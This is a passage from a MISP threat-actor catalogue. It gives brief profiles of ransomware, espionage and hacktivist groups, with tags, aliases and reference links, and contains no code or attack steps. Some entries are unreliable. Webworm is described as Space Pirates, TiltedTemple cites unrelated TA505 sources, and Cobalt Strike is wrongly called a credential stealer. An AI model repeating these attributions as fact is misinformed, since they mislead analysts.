https://blogs.blackberry.com/en/2023/02/newspenguin-a-previously-unknown-threat-actor-targets-pakistan-with-advanced-espionage-tool

DefrayX

DefrayX is a threat actor group known for their RansomExx ransomware operations. They primarily target Linux operating systems, but also release versions for Windows. The group has been active since 2018 and has targeted various sectors, including healthcare and manufacturing. They have also developed other malware strains such as PyXie RAT, Vatet loader, and Defray ransomware.

The tag is: misp-galaxy:threat-actor="DefrayX"

DefrayX is also known as:

  • Hive0091

Table 12278. Table References

Links

https://securityaffairs.co/wordpress/138933/malware/ransomexx-ransomware-rust-language.html

https://research.checkpoint.com/2022/28th-november-threat-intelligence-report/

https://securityintelligence.com/posts/ransomexx-upgrades-rust/

PerSwaysion

PerSwaysion is a threat actor known for conducting phishing campaigns targeting high-level executives. They have been active since at least August 2019 and are believed to be based in Vietnam. PerSwaysion has recently updated their techniques, using more direct phishing methods and leveraging Microsoft 365 to steal credentials.

The tag is: misp-galaxy:threat-actor="PerSwaysion"

Table 12279. Table References

Links

https://blog.group-ib.com/perswaysion

https://blog.scarletshark.com/perswaysion-threat-actor-updates-their-techniques-and-infrastructure-e9465157a653

Webworm

Space Pirates is a cybercrime group that has been active since at least 2017. They primarily target Russian companies and have been observed using various malware, including Deed RAT and ShadowPad. The group uses a combination of publicly available tools and their own protocols to communicate with their command-and-control servers.

The tag is: misp-galaxy:threat-actor="Webworm"

Webworm is also known as:

  • Space Pirates

Table 12280. Table References

Links

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-a-look-into-the-group-s-unconventional-techniques-new-attack-vectors-and-tools/

https://blog.polyswarm.io/space-pirates-target-russian-aerospace

N4ughtysecTU

In March 2022, a hacking group calling themselves N4ughtySecTU claimed to have breached TransUnion’s systems and threatened to leak four terabytes of data if the credit bureau didn’t pay a $15-million (R242-million) ransom.

The tag is: misp-galaxy:threat-actor="N4ughtysecTU"

Table 12281. Table References

Links

https://mybroadband.co.za/news/security/438982-how-bank-customers-can-protect-themselves-after-hackers-leak-transunion-data.html

https://cisoseries.com/cyber-security-headlines-march-21-2022/

https://mybroadband.co.za/news/security/443090-cybercriminals-love-south-africa-study.html

Moshen Dragon

Moshen Dragon is a Chinese-aligned cyberespionage threat actor operating in Central Asia. They have been observed deploying multiple malware triads and utilizing DLL search order hijacking to sideload ShadowPad and PlugX variants. The threat actor also employs various tools, including an LSA notification package and a passive backdoor known as GUNTERS. Their activities involve targeting the telecommunication sector and leveraging Impacket for lateral movement and data exfiltration.

The tag is: misp-galaxy:threat-actor="Moshen Dragon"

Table 12282. Table References

Links

https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/

TiltedTemple

One of their notable tools is a custom backdoor called SockDetour, which operates filelessly and socketlessly on compromised Windows servers. The group’s activities have been linked to the exploitation of vulnerabilities in Zoho ManageEngine ADSelfService Plus and ServiceDesk Plus.

The tag is: misp-galaxy:threat-actor="TiltedTemple"

TiltedTemple is also known as:

  • DEV-0322

  • Circle Typhoon

Table 12283. Table References

Links

https://unit42.paloaltonetworks.com/sockdetour/

https://blog.fox-it.com/2021/11/08/ta505-exploits-solarwinds-serv-u-vulnerability-cve-2021-35211-for-initial-access/

https://www.microsoft.com/en-us/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/

OldGremlin

OldGremlin is a Russian-speaking ransomware group that has been active for several years. They primarily target organizations in Russia, including banks, logistics, industrial, insurance, retail, and IT companies. OldGremlin is known for using phishing emails as an initial infection vector and has developed custom malware for both Windows and Linux systems. They have conducted multiple malicious email campaigns and demand large ransoms from their victims, with some reaching millions of dollars.

The tag is: misp-galaxy:threat-actor="OldGremlin"

Table 12284. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-new-ransomware-actor-oldgremlin-hits-multiple-organizations

https://www.group-ib.com/blog/oldgremlin-comeback/

https://www.group-ib.com/media-center/press-releases/oldgremlin/

Storm Cloud

Storm Cloud is a Chinese espionage threat actor known for targeting organizations across Asia, particularly Tibetan organizations and individuals. They use a variety of malware families, including GIMMICK and GOSLU, which are feature-rich and multi-platform. Storm Cloud leverages public cloud hosting services like Google Drive for command-and-control channels, making it difficult to detect their activities.

The tag is: misp-galaxy:threat-actor="Storm Cloud"

Table 12285. Table References

Links

https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-gimmick-malware-active-iocs

CostaRicto

CostaRicto is a cyber-espionage threat actor that operates as a mercenary group, offering its services to various clients globally. They use bespoke malware tools and sophisticated techniques like VPN proxy and SSH tunnelling. While their targets are scattered across different regions, there is a concentration in South Asia.

The tag is: misp-galaxy:threat-actor="CostaRicto"

Table 12286. Table References

Links

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

https://www.cybersecurityintelligence.com/blog/outsourced-cyber-spying-5335.html

TA402

TA402 is an APT group that has been tracked by Proofpoint since 2020. They primarily target government entities in the Middle East and North Africa, with a focus on intelligence collection. TA402 is known for using sophisticated phishing campaigns and constantly updating their malware implants and delivery methods to evade detection. They have been observed using cloud services like Dropbox and Google Drive for hosting malicious payloads and command-and-control infrastructure.

The tag is: misp-galaxy:threat-actor="TA402"

Table 12287. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta402-uses-complex-ironwind-infection-chains-target-middle-east-based-government

https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage

SilverFish

SilverFish is believed to be a Russian cyberespionage group that has been involved in various cyberattacks, including the use of the SolarWinds breach as an attack vector. SilverFish has been linked to the WastedLocker ransomware and has displayed a high level of skill and organization in their cyber operations. There are also connections between SilverFish and the threat actor Evil Corp, suggesting a possible evolution or collaboration between the two groups.

The tag is: misp-galaxy:threat-actor="SilverFish"

Table 12288. Table References

Links

https://www.truesec.com/hub/blog/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies

https://www.prodaft.com/resource/detail/silverfish-global-cyber-espionage-campaign-case-report

https://www.mandiant.com/resources/blog/unc2165-shifts-to-evade-sanctions

Blacktail

Blacktail is a cybercrime group that has gained attention for its ransomware campaigns, particularly the Buhti ransomware. They are known for using custom-built data exfiltration tools and have been observed exploiting vulnerabilities in both Windows and Linux systems.

The tag is: misp-galaxy:threat-actor="Blacktail"

Table 12289. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/buhti-ransomware

https://fortiguard.fortinet.com/threat-signal-report/5170

https://www.redpacketsecurity.com/new-buhti-ransomware-gang-uses-leaked-windows-linux-encryptors/

https://www.redpacketsecurity.com/buhti-ransomware-gang-switches-tactics-utilizes-leaked-lockbit-and-babuk-code/

MalKamak

MalKamak is an Iranian threat actor that has been operating since at least 2018. They have been involved in highly targeted cyber espionage campaigns against global aerospace and telecommunications companies. MalKamak utilizes a sophisticated remote access Trojan called ShellClient, which evades antivirus tools and uses cloud services like Dropbox for command and control.

The tag is: misp-galaxy:threat-actor="MalKamak"

Table 12290. Table References

Links

https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms

DragonForce

DragonForce is a hacktivist group based in Malaysia that has been involved in cyberattacks targeting government institutions and commercial organizations in India. They have also targeted websites affiliated with Israel and have shown support for pro-Palestinian causes. The group has been observed using defacement attacks, distributed denial-of-service attacks, and data leaks as part of their campaigns. DragonForce Malaysia has demonstrated an ability to adapt and evolve their tactics over time.

The tag is: misp-galaxy:threat-actor="DragonForce"

Table 12291. Table References

Links

https://www.darkowl.com/blog-content/hacktivist-groups-use-defacements-in-the-israel-hamas-conflict/

https://blog.radware.com/security/2023/05/india-one-of-the-most-targeted-countries-for-hacktivist-groups/

https://securitybrief.asia/story/dragonforce-malaysia-attacks-israeli-institutions-radware

https://www.radware.com/security/threat-advisories-and-attack-reports/opisrael-a-decade-in-review/

https://blog.radware.com/security/ddos/2022/08/this-was-h1-2022-part-3-beyond-the-war/

https://www.fortinet.com/blog/threat-research/guidance-on-hacktivist-operation-opspatuk-by-dragonforce

LightBasin

UNC1945 is an APT group that has been targeting telecommunications companies globally. They use Linux-based implants to maintain long-term access in compromised networks. UNC1945 has demonstrated advanced technical abilities, utilizing various tools and techniques to evade detection and move laterally through networks. They have also been observed targeting other industries, such as financial and professional consulting, and have been linked to other threat actors, including Mustang Panda and RedDelta.

The tag is: misp-galaxy:threat-actor="LightBasin"

LightBasin is also known as:

  • UNC1945

  • CL-CRI-0025

Table 12292. Table References

Links

https://www.mandiant.com/resources/unc2891-overview

https://www.crowdstrike.com/blog/an-analysis-of-lightbasin-telecommunications-attacks/

https://blog.talosintelligence.com/introducing-shrouded-snooper/

Red-Lili

RED-LILI is an active threat actor that has been identified by the Checkmarx SCS research team. They have been publishing malicious packages on the NPM and PyPI platforms, and have recently automated the process of creating NPM users for package publication. The Checkmarx team has detected around 1500 malicious packages associated with RED-LILI and has continuously disclosed their findings to the respective security teams.

The tag is: misp-galaxy:threat-actor="Red-Lili"

Table 12293. Table References

Links

https://checkmarx.com/blog/a-beautiful-factory-for-malicious-packages/

WildCard

Wildcard is a threat actor that initially targeted Israel’s educational sector with the SysJoker malware. They have since expanded their operations and developed additional malware variants, disguised as legitimate software, including one written in the Rust programming language called RustDown. Their precise identity remains unknown, but they have shown advanced capabilities and a focus on critical sectors within Israel.

The tag is: misp-galaxy:threat-actor="WildCard"

Table 12294. Table References

Links

https://intezer.com/blog/research/wildcard-evolution-of-sysjoker-cyber-threat/

WildPressure

WildPressure is a threat actor that targets industrial-related entities in the Middle East. They use a variety of programming languages, including C++, VBScript, and Python, to develop their malware. They have been observed using virtual private servers and compromised servers, particularly WordPress websites, in their infrastructure. While there are some minor similarities with other threat actors in the region, there is not enough evidence to make any attribution.

The tag is: misp-galaxy:threat-actor="WildPressure"

Table 12295. Table References

Links

https://www.redpacketsecurity.com/it-threat-evolution-q3-2021/

https://securelist.com/wildpressure-targets-macos/103072/

https://www.redpacketsecurity.com/wildpressure-targets-industrial-related-entities-in-the-middle-east/

https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/

TunnelSnake

The TunnelSnake campaign demonstrates the activity of a sophisticated actor that invests significant resources in designing an evasive toolset and infiltrating networks of high-profile organizations. By leveraging Windows drivers, covert communications channels and proprietary malware, the group behind it maintains a considerable level of stealth. That said, some of its TTPs, like the usage of a commodity webshell and open-source legacy code for loading unsigned drivers, may get detected and in fact were flagged by Kaspersky’s product, giving them visibility into the group’s operation.

The tag is: misp-galaxy:threat-actor="TunnelSnake"

Table 12296. Table References

Links

https://www.redpacketsecurity.com/operation-tunnelsnake/

https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/

ScamClub

ScamClub is a threat actor involved in malvertising activities since 2018. They target the Mobile Web market segment, particularly on iOS devices, where security software is often lacking. ScamClub utilizes obfuscation techniques and real-time bidding integration with ad exchanges to push malicious JavaScript payloads, leading to forced redirects and various scams such as phishing and gift card scams.

The tag is: misp-galaxy:threat-actor="ScamClub"

Table 12297. Table References

Links

https://blog.confiant.com/exploring-scamclub-payloads-via-deobfuscation-using-abstract-syntax-trees-65ef7f412537

https://www.malwarebytes.com/blog/threat-intelligence/2023/11/associated-press-espn-cbs-among-top-sites-serving-fake-virus-alerts

Daixin Team

Daixin is a threat actor group that has been active since at least June 2022. They primarily target the healthcare and public health sector with ransomware attacks, stealing sensitive data and threatening to release it if a ransom is not paid. They have successfully targeted various industries, including healthcare, aerospace, automotive, and packaged foods. Daixin gains initial access through VPN servers and exploits vulnerabilities or uses phishing attacks to obtain credentials. They have been responsible for cyberattacks on organizations such as the North Texas Municipal Water District and TransForm Shared Service Org, impacting their networks and stealing customer and patient information.

The tag is: misp-galaxy:threat-actor="Daixin Team"

Table 12298. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-294a

https://www.mycert.org.my/portal/details?menu=431fab9c-d24c-4a27-ba93-e92edafdefa5&id=467c2374-9c18-4fb0-b5a7-155dfca4d611

https://www.databreaches.net/b-files-leaked/

https://titaniam.io/ransomware-prevention-daixin-team-ransomware-group/

https://www.databreaches.net/update-daixin-leaks-more-data-from-bluewater-health-and-other-hospitals-databases-yet-to-be-leaked/

UNC2717

UNC2717 is a threat actor that engages in espionage activities aligned with Chinese government priorities. They demonstrate advanced tradecraft and take measures to avoid detection, making it challenging for network defenders to identify their tools and intrusion methods. UNC2717, along with other Chinese APT actors, has been observed stealing credentials, email communications, and intellectual property. They have targeted global government agencies using malware such as HARDPULSE, QUIETPULSE, and PULSEJUMP.

The tag is: misp-galaxy:threat-actor="UNC2717"

Table 12299. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html

http://internal-www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html

UNC2659

UNC2659 has been active since at least January 2021. We have observed the threat actor move through the whole attack lifecycle in under 10 days. UNC2659 is notable given their use of an exploit in the SonicWall SMA100 SSL VPN product, which has since been patched by SonicWall. The threat actor appeared to download several tools used for various phases of the attack lifecycle directly from those tools’ legitimate public websites.

The tag is: misp-galaxy:threat-actor="UNC2659"

Table 12300. Table References

Links

http://internal-www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

AeroBlade

AeroBlade is a previously unknown threat actor that has been targeting an aerospace organization in the United States. Their objective appears to be conducting commercial and competitive cyber espionage. They employ spear-phishing as a delivery mechanism, using weaponized documents with embedded remote template injection techniques and malicious VBA macro code. The attacks have been ongoing since September 2022, with multiple phases identified in the attack chain. The origin and precise objective of AeroBlade remain unknown.

The tag is: misp-galaxy:threat-actor="AeroBlade"

Table 12301. Table References

Links

https://blogs.blackberry.com/en/2023/11/aeroblade-on-the-hunt-targeting-us-aerospace-industry

WIP19

WIP19 is a Chinese-speaking threat group involved in espionage targeting the Middle East and Asia. They utilize a stolen certificate to sign their malware, including SQLMaggie, ScreenCap, and a credential dumper. The group has been observed targeting telecommunications and IT service providers, using toolsets authored by WinEggDrop. WIP19’s activities suggest they are after specific information and are part of the broader Chinese espionage landscape.

The tag is: misp-galaxy:threat-actor="WIP19"

Table 12302. Table References

Links

https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/

UNC2447

UNC2447 is a financially motivated threat actor with ties to multiple hacker groups. They have been observed deploying ransomware, including FiveHands and Hello Kitty, and engaging in double extortion tactics. They have been active since at least May 2020 and target organizations in Europe and North America.

The tag is: misp-galaxy:threat-actor="UNC2447"

Table 12303. Table References

Links

https://www.esentire.com/blog/hacker-infrastructure-used-in-cisco-breach-discovered-attacking-a-top-workforce-management-corporation-russias-evil-corp-gang-suspected-reports-esentire

https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html

http://internal-www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-financially-motivated-aggressive-group-carrying-out-ransomware-campaigns-active-iocs

UNC215

UNC215 is a Chinese nation-state threat actor that has been active since at least 2014. They have targeted organizations in various sectors, including government, technology, telecommunications, defense, finance, entertainment, and healthcare. UNC215 has been observed using tools such as Mimikatz, FOCUSFJORD, and HYPERBRO for initial access and post-compromise activities. They have demonstrated a focus on evading detection and have employed tactics such as using trusted third parties, minimizing forensic evidence, and incorporating false flags. UNC215’s targets are located globally, with a particular focus on the Middle East, Europe, Asia, and North America.

The tag is: misp-galaxy:threat-actor="UNC215"

Table 12304. Table References

Links

https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups

https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html

DEV-0569

DEV-0569, also known as Storm-0569, is a threat actor group that has been observed deploying the Royal ransomware. They utilize malicious ads and phishing techniques to distribute malware and gain initial access to networks. The group has been linked to the distribution of payloads such as Batloader and has forged relationships with other threat actors. DEV-0569 has targeted various sectors, including healthcare, communications, manufacturing, and education in the United States and Brazil.

The tag is: misp-galaxy:threat-actor="DEV-0569"

DEV-0569 is also known as:

  • Storm-0569

Table 12305. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/

UAC-0118

From Russia with Love (FRwL) is a threat actor group that emerged during the Russia-Ukraine war in 2022. They primarily engage in DDoS attacks and have targeted critical infrastructure, media, energy, and government entities. FRwL has been linked to the use of the Somnia ransomware, which they employ as a wiper rather than for financial gain. While there is no direct evidence linking FRwL to the Russian Main Intelligence Directorate, it is possible that they coordinate activities with state-aligned hacktivist groups.

The tag is: misp-galaxy:threat-actor="UAC-0118"

UAC-0118 is also known as:

  • FRwL

  • FromRussiaWithLove

Table 12306. Table References

Links

https://socprime.com/blog/somnia-malware-detection-uac-0118-aka-frwl-launches-cyber-attacks-against-organizations-in-ukraine-using-enhanced-malware-strains/

https://spixnet.at/cybersecurity-blog/2022/11/15/russian-hacktivists-hit-ukrainian-orgs-with-ransomware-but-no-ransom-demands/

https://outpost24.com/blog/ics-attack-classifications/

UAC-0050

UAC-0050 is a threat actor that has been active since 2020, targeting government agencies in Ukraine. They have been distributing the Remcos RAT malware through phishing campaigns, using tactics such as impersonating the Security Service of Ukraine and sending emails with malicious attachments. The group has also been linked to other hacking collectives, such as UAC-0096, and has previously used remote administration tools like Remote Utilities. The motive behind their attacks is likely espionage.

The tag is: misp-galaxy:threat-actor="UAC-0050"

Table 12307. Table References

Links

https://cert.gov.ua/article/3931296

https://socprime.com/blog/remcos-rat-detection-uac-0050-hackers-launch-phishing-attacks-impersonating-the-security-service-of-ukraine/

https://socprime.com/blog/new-phishing-attack-detection-attributed-to-the-uac-0050-and-uac-0096-groups-spreading-remcos-spyware/

https://cert.gov.ua/article/3804703

UNC2630

UNC2630 is a threat actor believed to be affiliated with the Chinese government. They engage in cyber espionage activities, targeting organizations aligned with Beijing’s strategic objectives. UNC2630 demonstrates advanced tradecraft and employs various malware families, including SLOWPULSE and RADIALPULSE, to compromise Pulse Secure VPN appliances. They also utilize modified binaries and scripts to maintain persistence and move laterally within compromised networks.

The tag is: misp-galaxy:threat-actor="UNC2630"

Table 12308. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html

http://internal-www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html

Sandman APT

First disclosed in 2023, the Sandman APT is likely associated with suspected China-based threat clusters known for using the KEYPLUG backdoor, specifically STORM-0866/Red Dev 40. Sandman is tracked as a distinct cluster, pending additional conclusive information. A notable characteristic is its use of the LuaDream backdoor. LuaDream is based on the Lua platform, a relatively rare occurrence in the cyberespionage domain, historically associated with APTs considered Western or Western-aligned.

The tag is: misp-galaxy:threat-actor="Sandman APT"

BiBiGun

A pro-Hamas hacktivist group developed a wiper called BiBi-Linux to target and destroy data on Israeli systems. The malware impersonates ransomware but operates solely to corrupt and delete files, indicating no data theft. A Windows variant, BiBi-Windows, was also discovered, sharing similarities with BiBi-Linux but targeting all files except executables. ESET researchers have named the group behind the wipers BiBiGun. The group’s TTPs have shown overlaps with Moses Staff, which is believed to have an Iran nexus.

The tag is: misp-galaxy:threat-actor="BiBiGun"

Table 12309. Table References

Links

https://twitter.com/ESETresearch/status/1719437301900595444

https://github.com/knight0x07/BiBi-Windows-Wiper-Analysis?tab=readme-ov-file

https://thehackernews.com/2023/11/new-bibi-windows-wiper-targets-windows.html

https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group

Storm-1283

Storm-1283 is a threat actor that targeted Microsoft Azure cloud platform. They gained access to user accounts and created OAuth applications using stolen credentials, allowing them to control resources and deploy virtual machines for cryptomining. The targeted organizations incurred significant financial losses ranging from $10,000 to $1.5 million. Storm-1283 utilized compromised accounts and subscriptions to carry out their illicit activities.

The tag is: misp-galaxy:threat-actor="Storm-1283"

Table 12310. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/

Solntsepek

Solntsepek is a threat actor group with ties to the Russian military unit GRU. They have claimed responsibility for a cyberattack on Kyivstar, a Ukrainian mobile operator, and have been linked to previous attacks on Ukrainian infrastructure. Solntsepek has been associated with the Sandworm hacking group, known for their destructive cyberattacks, including the NotPetya worm. They have also engaged in hostile activities, such as revealing personal details of Ukrainian soldiers.

The tag is: misp-galaxy:threat-actor="Solntsepek"

Table 12311. Table References

Links

https://kyivindependent.com/sbu-russian-hacker-group-reponsible-for-kyiv-star-cyberattack/

https://dev.ua/ru/news/atakovali-suspilne-provaiderov-i-minrazvitiya-obschin-kto-stoit-za-rossiiskoi-gruppirovkoi-solntsepek-kotoraya-aktivizirovala-napadeniya-na-ukrainskie-struktury

UNC4736

UNC4736 is a North Korean threat actor that has been involved in supply chain attacks targeting software chains of 3CX and X_TRADER. They have used malware strains such as TAXHAUL, Coldcat, and VEILEDSIGNAL to compromise Windows and macOS systems. UNC4736 has been linked to financially motivated cybercrime operations, particularly focused on cryptocurrency and fintech-related services. They have also demonstrated infrastructure overlap with other North Korean and APT43 activity.

The tag is: misp-galaxy:threat-actor="UNC4736"

Table 12312. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

GambleForce

GambleForce is a threat actor specializing in SQL injection attacks. They have targeted over 20 websites in various sectors across multiple countries, compromising six companies. GambleForce utilizes publicly available pentesting tools and has been active since mid-September 2023.

The tag is: misp-galaxy:threat-actor="GambleForce"

Table 12313. Table References

Links

https://www.group-ib.com/blog/gambleforce-gang/

GREF

GREF is a China-aligned APT group that has been active since at least March 2017. They are known for using custom backdoors, loaders, and ancillary tools in their targeted attacks. Recently, they have been attributed to two active Android campaigns that distribute the BadBazaar malware through malicious apps on official and alternative app stores. GREF has targeted Android users, particularly Uyghurs and other Turkic ethnic minorities outside of China, using trojanized versions of popular messaging apps like Signal and Telegram.

The tag is: misp-galaxy:threat-actor="GREF"

Table 12314. Table References

Links

https://www.welivesecurity.com/en/eset-research/badbazaar-espionage-tool-targets-android-users-trojanized-signal-telegram-apps/

PhantomControl

PhantomControl is a sophisticated threat actor that emerged in November 2023. They utilize phishing emails as their initial infection vector and employ a ScreenConnect client to establish a connection for their malicious activities. Their arsenal includes a VBS script that hides its true intentions and reveals a complex mechanism involving PowerShell scripts and image-based data retrieval. PhantomControl has been associated with the Blind Eagle threat actors, showcasing their versatility and reach.

The tag is: misp-galaxy:threat-actor="PhantomControl"

Table 12315. Table References

Links

https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat

https://www.esentire.com/blog/operation-phantomcontrol

https://securityonline.info/esentire-vs-phantom-unveiling-the-cyber-spooks-dance-of-darkness/

Team-Xecuter

Team-Xecuter is a hacking group led by Gary Bowser, also known as GaryOPA. They were involved in a piracy conspiracy against Nintendo, creating and selling illegal circumvention devices that allowed users to hack video game consoles for playing pirated games. Gary Bowser has admitted his participation in this activity and is facing legal consequences.

The tag is: misp-galaxy:threat-actor="Team-Xecuter"

Table 12316. Table References

Links

https://www.newslocker.com/en-uk/profession/security/ohio-schools-get-new-cybersecurity-resource/

KelvinSecurity

KelvinSecurity is a hacker group that has been active since at least 2015. They are known for their hacktivist and black hat activities, targeting public and private organizations globally. The group sells and leaks databases, documents, and access belonging to their victims, often on the dark web or their own platforms. They have been involved in attacks against various sectors, including telecommunications, political parties, and healthcare.

The tag is: misp-galaxy:threat-actor="KelvinSecurity"

Table 12317. Table References

Links

https://securelist.com/kaspersky-security-bulletin-apt-predictions-2024/111048/

https://www.privacyaffairs.com/kelvinsecurity-hacking-group-morena/

https://www.databreaches.net/bits-n-pieces-trozos-y-piezas-31/

https://www.ibtimes.com/anonymous-challenges-russias-supposed-cyber-prowess-repeat-rosatom-breach-leaks-data-3505131

Storm-1113

Storm-1113 is a threat actor that acts both as an access broker focused on malware distribution through search advertisements and as an “as-a-service” entity providing malicious installers and landing page frameworks. In Storm-1113 malware distribution campaigns, users are directed to landing pages mimicking well-known software that host installers, often MSI files, that lead to the installation of malicious payloads. Storm-1113 is also the developer of EugenLoader, a commodity malware first observed around November 2022.

The tag is: misp-galaxy:threat-actor="Storm-1113"

Table 12318. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/

HomeLand Justice

HomeLand Justice is an Iranian state-sponsored cyber threat group that has been active since at least May 2021. They have targeted various organizations, including a well-known telecommunication company and the Albanian Parliament. The group engaged in information operations and messaging campaigns to amplify the impact of their attacks.

The tag is: misp-galaxy:threat-actor="HomeLand Justice"

Table 12319. Table References

Links

https://www.picussecurity.com/resource/blog/cisa-alert-aa22-264a-iranian-homeland-justice-apt-groups-ttp

https://www.attackiq.com/2022/09/23/attack-graph-response-to-us-cert-alert-aa22-264a-iranian-state-actors-conduct-cyber-operations-against-the-government-of-albania/

https://www.mandiant.com/resources/blog/likely-iranian-threat-actor-conducts-politically-motivated-disruptive-activity-against

UAC-0099

UAC-0099 is a threat actor that has been active since at least May 2023, targeting Ukrainian entities. They have been observed using a known WinRAR vulnerability to carry out attacks, indicating a level of sophistication. The actor relies on PowerShell and the creation of scheduled tasks to execute malicious VBS files for initial infection. Monitoring and limiting the functionality of these components can help mitigate the risk of UAC-0099 attacks.

The tag is: misp-galaxy:threat-actor="UAC-0099"

Table 12320. Table References

Links

https://cert.gov.ua/article/4818341

https://www.deepinstinct.com/blog/threat-actor-uac-0099-continues-to-target-ukraine

Gray Sandstorm

Gray Sandstorm is an Iran-linked threat actor that has been active since at least 2012. They have targeted defense technology companies, maritime transportation companies, and Persian Gulf ports of entry. Their primary method of attack is password spraying, and they have been observed using tools like o365spray. They have a specific focus on US and Israeli targets and are likely operating in support of Iranian interests.

The tag is: misp-galaxy:threat-actor="Gray Sandstorm"

Gray Sandstorm is also known as:

  • DEV-0343

Table 12321. Table References

Links

https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/

https://www.microsoft.com/en-us/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/

Threatsec

ThreatSec is a hacktivist group that has targeted various organizations, including internet service providers in Gaza. They claim to fight for the rights and freedom of the oppressed and do not prioritize monetary gain. The group is part of the "Five Families" consortium, which includes other hacktivist groups such as GhostSec and Stormous. ThreatSec has been involved in cyberattacks, data breaches, and ransomware activities.

The tag is: misp-galaxy:threat-actor="Threatsec"

Table 12322. Table References

Links

https://www.resecurity.com/blog/article/ransomedvc-in-the-spotlight-what-we-know-about-the-ransomware-group-targeting-major-japanese-businesses

https://socradar.io/the-five-families-hacker-collaboration-redefining-the-game/

Cyber Toufan

Cyber Toufan is a threat actor group that has gained prominence for its cyberattacks targeting Israeli organizations. The group’s tactics suggest potential nation-state backing, possibly from Iran. They have been involved in hack-and-leak operations, data breaches, and data destruction, impacting over 100 organizations. Cyber Toufan’s activities align with geopolitical tensions in the Middle East and their attacks are characterized by a combination of technical breaches and psychological warfare.

The tag is: misp-galaxy:threat-actor="Cyber Toufan"

Table 12323. Table References

Links

https://www.darkreading.com/cyberattacks-data-breaches/-cyber-toufan-hacktivists-leaked-100-plus-israeli-orgs-in-one-month

https://socradar.io/dark-web-profile-cyber-toufan-al-aqsa/

https://research.checkpoint.com/2023/11th-december-threat-intelligence-report/

https://blog.polyswarm.io/2023-recap-cyber-activity-in-the-gaza-conflict

https://www.securityweek.com/palestinian-hackers-hit-100-israeli-organizations-in-destructive-attacks/

Water Curupira

With its emergence in 2022, Water Curupira has established itself as a persistent threat actor targeting organizations primarily in South America and Europe. Their modus operandi involves a combination of social engineering tactics and a diversified malware arsenal, including ransomware variants like Black Basta and credential stealers like Cobalt Strike. This multifaceted approach enables them to gain unauthorized access to victim systems, steal sensitive data, and ultimately extort victims through ransomware demands. It has been actively using Pikabot, a loader malware with similarities to Qakbot, in spam campaigns throughout 2023.

The tag is: misp-galaxy:threat-actor="Water Curupira"

Table 12324. Table References

Links

https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html

UTA0178

While Volexity largely observed the attacker essentially living off the land, they still deployed a handful of malware files and tools during the course of the incident which primarily consisted of webshells, proxy utilities, and file modifications to allow credential harvesting. Once UTA0178 had access into the network via the ICS VPN appliance, their general approach was to pivot from system to system using compromised credentials. They would then further compromise credentials of users on any new system that was breached, and use these credentials to log into additional systems via RDP. Volexity observed the attacker obtaining credentials in a variety of ways.

The tag is: misp-galaxy:threat-actor="UTA0178"

UTA0178 is also known as:

  • UNC5221

Table 12325. Table References

Links

https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/

https://www.rewterz.com/rewterz-news/rewterz-threat-advisory-ivanti-vpn-zero-days-weaponized-by-unc5221-threat-actors-to-deploy-multiple-malware-families-active-iocs/

https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day

https://quointelligence.eu/2024/01/unc5221-unreported-and-undetected-wirefire-web-shell-variant/

https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

TAG-28

